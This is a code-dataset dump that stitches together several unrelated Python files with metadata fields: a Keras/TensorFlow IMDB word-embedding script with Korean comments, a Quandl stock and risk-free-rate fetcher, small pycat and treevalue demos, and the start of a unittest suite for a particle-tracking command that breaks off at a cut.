history = model.fit(x_train, y_train, epochs=10, batch_size=32, validation_data=(x_val, y_val))
## tensorflow embedding ##
y_train = y_train.reshape(-1, 1)
y_val = y_val.reshape(-1, 1)
X = tf.placeholder(dtype=tf.float32, shape=[None, 100])
y = tf.placeholder(dtype=tf.float32, shape=[None, 1])
W1 = tf.Variable(tf.random_uniform(shape=[100, 10000], dtype=tf.float32, seed=7))
b1 = tf.Variable(tf.random_uniform(shape=[10000], dtype=tf.float32, seed=7))
flatten = tf.layers.flatten(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_uniform(shape=[10000, 1], dtype=tf.float32, seed=7))
b2 = tf.Variable(tf.random_uniform(shape=[1], dtype=tf.float32, seed=7))
logits = tf.sigmoid(tf.matmul(flatten, W2) + b2)
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=y))
train = tf.train.AdamOptimizer(0.1).minimize(cost)
correct = tf.cast(logits > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(y, correct), dtype=tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
dataset = tf.data.Dataset.from_tensor_slices((X, y))
dataset = dataset.repeat().batch(32)
iterator = dataset.make_initializable_iterator()
next_element = iterator.get_next()
sess.run(iterator.initializer, feed_dict={X:x_train, y:y_train})
# train #
for epoch in range(50):
total_batch = int(x_train.shape[0] / 32)
train_cost = 0
for i in range(total_batch): # epoch에 의해 돌아가는 1번 batch 회전
x_batch, y_batch = sess.run(next_element)
cost_val, _ = sess.run([cost, train], feed_dict={X: x_batch, y: y_batch})
train_cost += cost_val / total_batch
print("cost: ", train_cost)
acc, cor, y_hat = sess.run([accuracy, correct, logits],
feed_dict={X: x_val, y: y_val})
print(acc)
| ### w2v ###
import numpy as np
from keras.datasets import imdb
from keras import preprocessing
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding
import os
from keras.preprocessing.text import Tokenizer # token
from keras.preprocessing.sequence import pad_sequences # array화
import tensorflow as tf
max_features = 1000 # 빈번단어 1000개
maxlen = 20 # 사용 텍스트 길이?
# data download #
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features) # 영화 리뷰 데이터 --> word index array
# 20차원으로 축소 #
x_train = preprocessing.sequence.pad_sequences(x_train, maxlen=maxlen) # shape=(25000,20)
x_test = preprocessing.sequence.pad_sequences(x_test, maxlen=maxlen) # (25000, 20)
## embedding layer ##
model = Sequential()
model.add(Embedding(input_dim=10000, output_dim=8, input_length=maxlen))
model.add(Flatten())
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
model.summary()
history = model.fit(x_train, y_train,
epochs=10, batch_size=32, validation_split=0.2)
model.summary()
### pretrained embedding model ###
imdb_dir = 'd:/data/datasets/aclImdb'
train_dir = os.path.join(imdb_dir, 'train')
labels = [] # 25000 label(pos / neg)
texts = [] # 25000 (sentences)
## label 마다 load ##
for label_type in ['neg', 'pos']:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
if fname[-4:] == '.txt':
f = open(os.path.join(dir_name, fname), encoding="utf-8")
texts.append(f.read())
f.close()
if label_type == 'neg':
labels.append(0)
else:
labels.append(1)
maxlen = 100 # 단어개수최대
training_samples = 15000
validation_samples = 10000
max_words = 10000 # dataset에서 사용할 단어개수
tokenizer = Tokenizer(num_words=max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
data = pad_sequences(sequences, maxlen=maxlen)
labels = np.asarray(labels)
np.random.seed(7)
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
x_train = data[:training_samples]
y_train = labels[:training_samples]
x_val = data[training_samples: training_samples + validation_samples]
y_val = labels[training_samples: training_samples + validation_samples]
## pretrained: Glove ##
glove_dir = 'd:/data/datasets/'
embeddings_index = {}
f = open(os.path.join(glove_dir, 'glove.6B.100d.txt'), encoding='utf8')
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
# embedding matrix #
embedding_dim = 100
embedding_matrix = np.zeros((max_words, embedding_dim))
for word, i in word_index.items():
if i < max_words:
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(max_words, embedding_dim, input_length=maxlen))
model.add(Flatten())
model.add(Dense(32, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.summary()
# weight set #
model.layers[0].set_weights([embedding_matrix])
model.layers[0].trainable = False
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
history = model.fit(x_train, y_train, epochs=10, batch_size=32, validation_data=(x_val, y_val))
## tensorflow embedding ##
y_train = y_train.reshape(-1, 1)
y_val = y_val.reshape(-1, 1)
X = tf.placeholder(dtype=tf.float32, shape=[None, 100])
y = tf.placeholder(dtype=tf.float32, shape=[None, 1])
W1 = tf.Variable(tf.random_uniform(shape=[100, 10000], dtype=tf.float32, seed=7))
b1 = tf.Variable(tf.random_uniform(shape=[10000], dtype=tf.float32, seed=7))
flatten = tf.layers.flatten(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_uniform(shape=[10000, 1], dtype=tf.float32, seed=7))
b2 = tf.Variable(tf.random_uniform(shape=[1], dtype=tf.float32, seed=7))
logits = tf.sigmoid(tf.matmul(flatten, W2) + b2)
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=y))
train = tf.train.AdamOptimizer(0.1).minimize(cost)
correct = tf.cast(logits > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(y, correct), dtype=tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
dataset = tf.data.Dataset.from_tensor_slices((X, y))
dataset = dataset.repeat().batch(32)
iterator = dataset.make_initializable_iterator()
next_element = iterator.get_next()
sess.run(iterator.initializer, feed_dict={X:x_train, y:y_train})
# train #
for epoch in range(50):
total_batch = int(x_train.shape[0] / 32)
train_cost = 0
for i in range(total_batch): # epoch에 의해 돌아가는 1번 batch 회전
x_batch, y_batch = sess.run(next_element)
cost_val, _ = sess.run([cost, train], feed_dict={X: x_batch, y: y_batch})
train_cost += cost_val / total_batch
print("cost: ", train_cost)
acc, cor, y_hat = sess.run([accuracy, correct, logits],
feed_dict={X: x_val, y: y_val})
print(acc)
| ko | 0.674029 | ### w2v ### # token # array화 # 빈번단어 1000개 # 사용 텍스트 길이? # data download # # 영화 리뷰 데이터 --> word index array # 20차원으로 축소 # # shape=(25000,20) # (25000, 20) ## embedding layer ## ### pretrained embedding model ### # 25000 label(pos / neg) # 25000 (sentences) ## label 마다 load ## # 단어개수최대 # dataset에서 사용할 단어개수 ## pretrained: Glove ## # embedding matrix # # weight set # ## tensorflow embedding ## # train # # epoch에 의해 돌아가는 1번 batch 회전 | 2.845174 | 3 |
quant_risk/utils/fetch_data.py | QAM-ATC/Risk | 1 | 6612395 | import pandas as pd
import quandl
import datetime as dt
from typing import Union
__all__ = [
'test_set',
'risk_free_rate'
]
# Gets test datasets from the quandl api
def test_set(startDate: str = None, endDate: str = None, ticker: Union[str, list] = "AAPL", **kwargs) -> pd.DataFrame:
"""Test sets which are called from Quandl each time.
The function currently calls the given ticker close prices from the WIKI/PRICES database from Quandl.
If no startDate or endDate is provided, the function returns the trailing twelve months (TTM) close prices for the ticker
Parameters
----------
startDate : str, optional
Incase the user wants to supply a startDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
endDate : str, optional
Incase the user wants to supply a endDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
ticker : str, optional
The test set ticker dataset that is called.
Incase, the called ticker is not available in the WIKI/PRICES database,
the function throws an error, by default "AAPL"
Returns
-------
pd.DataFrame
Returns a pandas dataframe object consisting of the called data for the ticker
"""
# Incase the ticker provided is a single string rather than a list of tickers
if isinstance(ticker, str):
ticker = [ticker]
# Both start and end dates must be provided else the call reverts to the default set of
# endDate as today and startDate as a year back
if not isinstance(startDate, str) or not isinstance(endDate, str):
endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
try:
# The standard database that we want to use for our test cases
# Please note: the database does not have data beyond 2018-03-27, it will be swapped out in future versions
database = "WIKI/PRICES"
# Filtering the database by columns to only return the ticker, date, and close price for the dates greater than
# or equal to the startDate and less than and equal to the endDate
data = quandl.get_table(database, qopts = { 'columns': ['ticker', 'date', 'close'] },
ticker = ticker, date = { 'gte': startDate, 'lte': endDate })
data = data.pivot(index='date', columns='ticker', values='close')
except: raise ImportError("Unable to Import test data, please try again.")
else:
print(f"...Data for {ticker} from {startDate} to {endDate} loaded successfully")
return data
def risk_free_rate(startDate: str = None, endDate: str = None, **kwargs) -> pd.DataFrame:
"""The function returns the riskFreeRate for a given start and end date from Quandl.
For now, the riskFreeRate is defined as the 3 Month US Treasury Bill Rate which is accessible
through the database: "USTREASURY/YIELD.1"
Parameters
----------
startDate : str, optional
Incase the user wants to supply a startDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
endDate : str, optional
Incase the user wants to supply a endDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
Returns
-------
pd.DataFrame
Returns a pandas dataframe object consisting of the called data for the riskFreeRate
"""
# Both start and end dates must be provided else the call reverts to the default set of
# endDate as today and startDate as a year back
if not isinstance(startDate, str) or not isinstance(endDate, str):
endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
try:
# The standard database that we want to use for our test cases
database = "USTREASURY/YIELD.3"
data = quandl.get(database, start_date = startDate, end_date = endDate)
data.columns = ['riskFreeRate']
except: raise ImportError("Unable to Import test data, please try again.")
else:
print(f"...Data for {database} from {startDate} to {endDate} loaded successfully")
return data | import pandas as pd
import quandl
import datetime as dt
from typing import Union
__all__ = [
'test_set',
'risk_free_rate'
]
# Gets test datasets from the quandl api
def test_set(startDate: str = None, endDate: str = None, ticker: Union[str, list] = "AAPL", **kwargs) -> pd.DataFrame:
"""Test sets which are called from Quandl each time.
The function currently calls the given ticker close prices from the WIKI/PRICES database from Quandl.
If no startDate or endDate is provided, the function returns the trailing twelve months (TTM) close prices for the ticker
Parameters
----------
startDate : str, optional
Incase the user wants to supply a startDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
endDate : str, optional
Incase the user wants to supply a endDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
ticker : str, optional
The test set ticker dataset that is called.
Incase, the called ticker is not available in the WIKI/PRICES database,
the function throws an error, by default "AAPL"
Returns
-------
pd.DataFrame
Returns a pandas dataframe object consisting of the called data for the ticker
"""
# Incase the ticker provided is a single string rather than a list of tickers
if isinstance(ticker, str):
ticker = [ticker]
# Both start and end dates must be provided else the call reverts to the default set of
# endDate as today and startDate as a year back
if not isinstance(startDate, str) or not isinstance(endDate, str):
endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
try:
# The standard database that we want to use for our test cases
# Please note: the database does not have data beyond 2018-03-27, it will be swapped out in future versions
database = "WIKI/PRICES"
# Filtering the database by columns to only return the ticker, date, and close price for the dates greater than
# or equal to the startDate and less than and equal to the endDate
data = quandl.get_table(database, qopts = { 'columns': ['ticker', 'date', 'close'] },
ticker = ticker, date = { 'gte': startDate, 'lte': endDate })
data = data.pivot(index='date', columns='ticker', values='close')
except: raise ImportError("Unable to Import test data, please try again.")
else:
print(f"...Data for {ticker} from {startDate} to {endDate} loaded successfully")
return data
def risk_free_rate(startDate: str = None, endDate: str = None, **kwargs) -> pd.DataFrame:
"""The function returns the riskFreeRate for a given start and end date from Quandl.
For now, the riskFreeRate is defined as the 3 Month US Treasury Bill Rate which is accessible
through the database: "USTREASURY/YIELD.1"
Parameters
----------
startDate : str, optional
Incase the user wants to supply a startDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
endDate : str, optional
Incase the user wants to supply a endDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
Returns
-------
pd.DataFrame
Returns a pandas dataframe object consisting of the called data for the riskFreeRate
"""
# Both start and end dates must be provided else the call reverts to the default set of
# endDate as today and startDate as a year back
if not isinstance(startDate, str) or not isinstance(endDate, str):
endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
try:
# The standard database that we want to use for our test cases
database = "USTREASURY/YIELD.3"
data = quandl.get(database, start_date = startDate, end_date = endDate)
data.columns = ['riskFreeRate']
except: raise ImportError("Unable to Import test data, please try again.")
else:
print(f"...Data for {database} from {startDate} to {endDate} loaded successfully")
return data | en | 0.811387 | # Gets test datasets from the quandl api Test sets which are called from Quandl each time. The function currently calls the given ticker close prices from the WIKI/PRICES database from Quandl. If no startDate or endDate is provided, the function returns the trailing twelve months (TTM) close prices for the ticker Parameters ---------- startDate : str, optional Incase the user wants to supply a startDate to call data from a specific time period The format is "YYYY-MM-DD", by default None endDate : str, optional Incase the user wants to supply a endDate to call data from a specific time period The format is "YYYY-MM-DD", by default None ticker : str, optional The test set ticker dataset that is called. Incase, the called ticker is not available in the WIKI/PRICES database, the function throws an error, by default "AAPL" Returns ------- pd.DataFrame Returns a pandas dataframe object consisting of the called data for the ticker # Incase the ticker provided is a single string rather than a list of tickers # Both start and end dates must be provided else the call reverts to the default set of # endDate as today and startDate as a year back # The standard database that we want to use for our test cases # Please note: the database does not have data beyond 2018-03-27, it will be swapped out in future versions # Filtering the database by columns to only return the ticker, date, and close price for the dates greater than # or equal to the startDate and less than and equal to the endDate The function returns the riskFreeRate for a given start and end date from Quandl. For now, the riskFreeRate is defined as the 3 Month US Treasury Bill Rate which is accessible through the database: "USTREASURY/YIELD.1" Parameters ---------- startDate : str, optional Incase the user wants to supply a startDate to call data from a specific time period The format is "YYYY-MM-DD", by default None endDate : str, optional Incase the user wants to supply a endDate to call data from a specific time period The format is "YYYY-MM-DD", by default None Returns ------- pd.DataFrame Returns a pandas dataframe object consisting of the called data for the riskFreeRate # Both start and end dates must be provided else the call reverts to the default set of # endDate as today and startDate as a year back # The standard database that we want to use for our test cases | 3.404518 | 3 |
pycat/test/intersection_test.py | cmorace/pycat | 0 | 6612396 | <reponame>cmorace/pycat
from pycat.base.event.mouse_event import MouseEvent
from pycat.core import Window, Point, Color
from pycat.shape import Circle, Line
from pycat.geometry.intersection import line_intersection
w = Window()
def on_mouse_motion(m: MouseEvent):
w.clear_drawables()
a = Point(0, w.height)
b = m.position
c = Point(100, 100)
d = Point(w.width-100, w.height-100)
w.add_drawable(Line(a, b))
w.add_drawable(Line(c, d))
x = line_intersection(a.x, a.y, b.x, b.y, c.x, c.y, d.x, d.y)
if x:
w.add_drawable(Circle(x, 10, color=Color.RED))
w.run(on_mouse_motion=on_mouse_motion)
| from pycat.base.event.mouse_event import MouseEvent
from pycat.core import Window, Point, Color
from pycat.shape import Circle, Line
from pycat.geometry.intersection import line_intersection
w = Window()
def on_mouse_motion(m: MouseEvent):
w.clear_drawables()
a = Point(0, w.height)
b = m.position
c = Point(100, 100)
d = Point(w.width-100, w.height-100)
w.add_drawable(Line(a, b))
w.add_drawable(Line(c, d))
x = line_intersection(a.x, a.y, b.x, b.y, c.x, c.y, d.x, d.y)
if x:
w.add_drawable(Circle(x, 10, color=Color.RED))
w.run(on_mouse_motion=on_mouse_motion) | none | 1 | 3.277069 | 3 | |
docs/source/tutorials/advanced_usage/flatten_demo.demo.py | HansBug/treevalue | 0 | 6612397 | <gh_stars>0
from treevalue import TreeValue, raw, flatten
if __name__ == '__main__':
t = TreeValue({
'a': 1,
'b': 2,
'c': raw({'x': 3, 'y': 4}),
'd': {
'x': 3,
'y': 4
},
})
print('flatten(t):')
print(flatten(t))
| from treevalue import TreeValue, raw, flatten
if __name__ == '__main__':
t = TreeValue({
'a': 1,
'b': 2,
'c': raw({'x': 3, 'y': 4}),
'd': {
'x': 3,
'y': 4
},
})
print('flatten(t):')
print(flatten(t)) | none | 1 | 3.142183 | 3 | |
tests/commands/test_trackparticles.py | gvalentini85/betrack-cli | 0 | 6612398 | #------------------------------------------------------------------------------#
# Copyright 2018 <NAME>. All rights reserved. Use of this source #
# code is governed by a MIT license that can be found in the LICENSE file. #
#------------------------------------------------------------------------------#
"""
Tests for module `betrack.commands.trackparticles`.
"""
try:
from os import EX_OK, EX_CONFIG
except ImportError:
EX_OK = 0
EX_CONFIG = 78
from unittest import TestCase, skip
from tempfile import NamedTemporaryFile
from os import remove, name
from os.path import isfile, dirname, realpath
from cv2 import VideoWriter, VideoWriter_fourcc
from numpy import arange, array, zeros, uint8
from betrack.commands.trackparticles import *
class TestTrackParticles(TestCase):
@classmethod
def setUpClass(cls):
# Create temporary video file..
cls._vf = NamedTemporaryFile(mode='w', suffix='.avi', delete=False)
cls._vf.close()
cls._nframes = 10
cls._pdiameter = 11 # Must be odd!
cls._nparticles = 5
cls._voffset = 100
cls._hoffset = 10
codec = VideoWriter_fourcc('M', 'J', 'P', 'G')
cls._framerate = cls._nframes
cls._frameshape = (1000, 1000, 3)
oshape = cls._frameshape[0:2][::-1]
writer = VideoWriter(cls._vf.name, codec, cls._framerate, oshape)
for i in arange(0, cls._nframes):
f = zeros(cls._frameshape, dtype=uint8)
for p in arange(0, cls._nparticles):
pr = int(cls._pdiameter/2)
y = cls._voffset * (p + 1)
y = arange(y - pr, y + pr + 1)
x = cls._voffset + cls._hoffset * (i + 1)
x = arange(x - pr, x + pr + 1)
f[y, x, 1] = 255
f = array(f)
writer.write(f)
writer.release()
@classmethod
def tearDownClass(cls):
# Remove temporary file..
if name != 'nt': remove(cls._vf.name)
def test_configure_tracker(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-exportas: excel')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 12')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('jobs:')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-featuresdark: 11\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-minmass: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-maxsize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-separation: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-noisesize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-smoothingsize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-threshold: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-percentile: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-topn: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-preprocess: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-memory: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-predict: yep\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-adaptivestop: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-adaptivestep: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-st-threshold: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-cl-quantile: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-cl-threshold: 0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('jobs:\n')
cf.write(' - video: dummy.avi\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
def test_locate_features(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset) * 2 + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
self.assertEqual(tp.jobs[0].outdir, dirname(realpath(self._vf.name)))
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].h5storage))
self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
dirname(realpath(self._vf.name)))
with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
res = sf.dump()
self.assertEqual(res.shape, (self._nframes * self._nparticles, 9))
tp.jobs[0].release_memory()
remove(cf.name)
def test_link_trajectories(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].h5storage))
self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
dirname(realpath(self._vf.name)))
with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
res = sf.dump()
self.assertEqual(res.shape, (self._nframes * self._nparticles, 10))
self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
tp.jobs[0].release_memory()
remove(cf.name)
def test_filter_trajectories(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('tp-filter-cl-threshold: 200\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
tp.filter_trajectories(tp.jobs[0])
self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
tp.jobs[0].release_memory()
remove(cf.name)
def test_export_video(self):
